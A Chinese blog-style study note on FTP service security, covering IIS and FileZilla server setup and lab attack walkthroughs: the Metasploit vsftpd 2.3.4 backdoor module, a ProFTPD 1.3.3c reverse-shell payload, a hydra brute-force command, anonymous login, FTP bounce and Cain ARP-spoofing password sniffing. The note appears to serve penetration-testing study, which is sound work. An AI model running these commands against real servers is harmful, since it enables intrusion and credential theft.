端口与服务-ftp服务
端口与服务-ftp服务
1概述
1.1.从先知和乌云上爬取端口历史漏洞报告,总结报告
1.2.全面总结,出具一个表格之类的汇总表
2.ftp
# -*- coding: utf-8 -*-
import requests,re,sys
def wooyun_chax(keywords,page):
url =
"https://wooyun.x10sec.org/search?keywords="+keywords+"&&content_search_by=by_bugs&&search_by_html=False&&page="+page
print(url)
req = requests.get(url)
text = req.text
r = re.findall('<td><a
href="(.*?)" target="_blank">\s(.*?)</a>',text)
for i in r:
print("漏洞名称:"+i[1])
print("漏洞链接:"+"https://wooyun.x10sec.org/"+i[0])
print("漏洞总结:")
wooyun_chax(sys.argv[1],sys.argv[2])
2.1 ftp搭建
iis搭建
1.安装ftp服务:控制面板-程序和功能-打开或关闭windows功能-internet信息服务-ftp服务
2.查询ftp服务:计算机-管理-iis
3.创建一个ftp站点:右键-添加ftp站点-填写站点名称/目录-端口和IP-权限设置
4.启动
FileZillaServer搭建
1.安装:FileZillaServer-百度搜索下载-安装,打开
2.设置:打开-设置端口-edit-users-shared folders设置目录-添加用户-general设置密码
3.查看日志:edit-settings
2.2典型案列
1.后门vsftpd https://www.freebuf.com/column/143480.html
总结
1.搜索:钟馗之眼搜索 product:vsftpd 2.3.4
2.nmap漏洞探测:nmap --script=vuln且提示anonymous可以匿名登录
3.msf攻击
1.use exploit/unix/ftp/vsftpd_234_backdoor
2.set rhost和rport
3.exploit攻击
4.创建用户,提权
2.ftp远程代码溢出 https://blog.csdn.net/weixin_42214273/article/details/82892282
总结
1.环境:靶机 192.168.88.165 攻击机 192.168.88.138
2.扫描:nmap -sV 192.168.88.165 扫描服务和版本
nmap -A -v 192.168.88.165 扫描全部信息 不好用
nmap -O 192.168.88.165 探测靶场的操作系统类型与版本
3.发现开启的服务:ftp proftpd 1.3.3c
4.在kali中搜索漏洞:searchsploit ProFTPD 1.3.3c 未找到
5.msf中搜索相应漏洞模块:search ProFTPD 1.3.3c
配置1.设置payload set payload cmd/unix/reverse
2.设置lhost和rhost
3.exploit攻击
4.id查看
5.端口优化:python –c “import pty;pty.spawn(‘/bin/bash’)”
6.获取flag:一般flag放在root下 cd /root
3.ftp跳转攻击。 https://blog.csdn.net/mgxcool/article/details/48249473
2.3 攻击方式
ftp://192.168.43.85 1.正常输入uname和paw登陆,显示乱码。解决:控制面板-区域和语言-当前系统区域设置-设置为中文(简体,中国)
2.匿名访问 用户名:anonymous 密码:为空或者任意邮箱
3.直接访问
4.暴力猜解 hydra 192.168.43.85 ftp -L username.txt -P pwd.txt -o 111.txt
5.后门vsftpd
6.ftp远程代码溢出
7.跳转攻击
8.嗅探 cain嗅探ftp密码
2.4 cain嗅探ftp密码
1.设置 网卡设置cain-configure-sniffer-选择用于嗅探的网卡
arp中可以设置伪造的ip和mac地址
端口设置filters and ports-设置嗅探的端口
2.操作 找到被欺骗的IP:点击sniffer-scan mac address-打开arp页面-选择被欺骗的IP
点击嗅探
结果:passwords处显示抓取的密码
端口与服务-ftp服务的更多相关文章
- FTP服务安装与端口说明
FTP服务安装与端口说明 FTP端口修改安装部署windowswindows 2012文件服务 1. FTP服务介绍 1.1 什么是FTP FTP(File Transfer Protocol)是文件 ...
- 修改ftp服务的监听端口
需求说明: 今天在做一个项目的时候,低端的端口都给屏蔽掉了,需要进行修改为高端端口才能访问,在此记录下. 操作过程: 1.修改ftp的配置文件vsftpd.conf,增加以下的配置 listen_po ...
- ftp服务配置文件记录
因为南京的客户死活要ftp服务而不是sftp,所以我作手用vsftp作为服务器,尝试在windows ftp软件登录进去,特记录vsftp的用法. 配置文件在/etc/vsftpd.conf 有如下代 ...
- CentOS7 FTP服务搭建(虚拟用户访问FTP服务)
概述 最近在搞Oracle在Linux系统下集群,针对Linux系统,笔人也是一片空白.Liunx外部文件的传输,避免不了使用FTP服务,所以现在就整理下,CentOS7环境下,FTP服务的搭建.FT ...
- 5. 网络配置与FTP服务笔记
IP地址: Ipv4 2*32 Ipv6 tcp 网络通讯协议 udp 用户数据报协议 常见网络端口: 20 21 ftp服务 文件共享 22 ...
- Linux安装FTP服务
转自:http://blog.csdn.net/huangbiao86/article/details/6641952 ftp服务器 1. 在Linux和其他机器之间共享文件(在linux下安装ft ...
- Linux SSH,FTP服务配置
CentOS-6.4-x86_64-minimal 0.网卡配置 参考:Linux系统\Centos没有网卡eth0配置文件怎么办? - http://jingyan.baidu.com/articl ...
- CentOS系统下安装配置ftp服务
安装配置步骤: rpm -ivh /opt/bak/vsftpd-2.2.2-11.el6.x86_64.rpm --本地安装vsftpd ll /etc/vsftpd/ --查看vsftpd的配置 ...
- Ubuntu学习总结-02 Ubuntu下的FTP服务的安装和设置
一 安装vsftpd 在安装前vsftpd,先更新apt-get下载的数据源输入如下命令: sudo apt-get update 然后安装vsftpd sudo apt-get install vs ...
随机推荐
- NDK学习笔记-多线程与生产消费模式
在做NDK开发的时候,很多情况下都是需要使用多线程的,一方面是提高程序运行效率,另一方面就是防止主线程阻塞 C的多线程 在C语言里,可以通过对于POSIX标准的运用,使得C语言执行多线程 提高程序的执 ...
- rqnoj PID95:多多看DVD(加强版)
题目描述 多多进幼儿园了,今天报名了.只有今晚可以好好放松一下了(以后上了学后会很忙).她的叔叔决定给他买一些动画片DVD晚上看.可是爷爷规定他们只能在一定的时间段L看完.(因为叔叔还要搞NOIP不能 ...
- yum源 epel源 替换及安装
#!/bin/sh # 备份yum源 zip -r /etc/yum.repos.d/yum_resource_back_up.zip /etc/yum.repos.d/* # 替换yum源 wget ...
- 什么是阿里云CDN
阿里云内容分发网络(Content Delivery Network,简称CDN)是建立并覆盖在承载网之上,由分布在不同区域的边缘节点服务器群组成的分布式网络.阿里云CDN分担源站压力,避免网络拥塞, ...
- 微信公众号通过用户授权获取用户基本信息java版
公司需要开发一个微信公众号,要求用户通过公众号登录公司网站时候自动获取用户的基本信息,在网上查资料发现大部分都是直接copy微信公众平台的开发文档,感觉还是介绍的不是太小白,所以为了方便大家也为了自己 ...
- Idea中Smart Tomcat插件启动报NullPointerException问题
如果你跟我一样用的是Idea Community社区版的话,也一定会遇到用Smart Tomcat插件启动报错的问题: 这个问题网上搜了一圈,大家好像也都遇到过了,不过也都没有找到原因和给出解决方案. ...
- 连续取数字DP使值最大HDU2697
题意: 有n个数,每个数都有价钱,连续的取可以获得len*len的利益,使利益最大. 思路: 三维DP,1.2.3维分别是第i个,剩余多少钱,从后往前连续的有几个. #define IOS ios_b ...
- docker-compose搭建elasticsearch+kibana环境,以及php使用elasticsearch
一.elasticsearch的Dockerfile 增加中文搜索插件analysis-ik FROM docker.elastic.co/elasticsearch/elasticsearch:7. ...
- 【静态延迟加载】self关键字和static关键字的区别
先来看下代码,从代码中发现问题.解决问题 //先实现一个手机工厂类 class Phone{ public static function setBrand(){ echo "Main Ph ...
- Python 运算符与数据类型
Python 的创始人为吉多·范罗苏姆(Guido van Rossum).1989年的圣诞节期间,吉多·范罗苏姆为了在阿姆斯特丹打发时间,决心开发一个新的脚本解释程序,作为ABC语言的一种继承.Py ...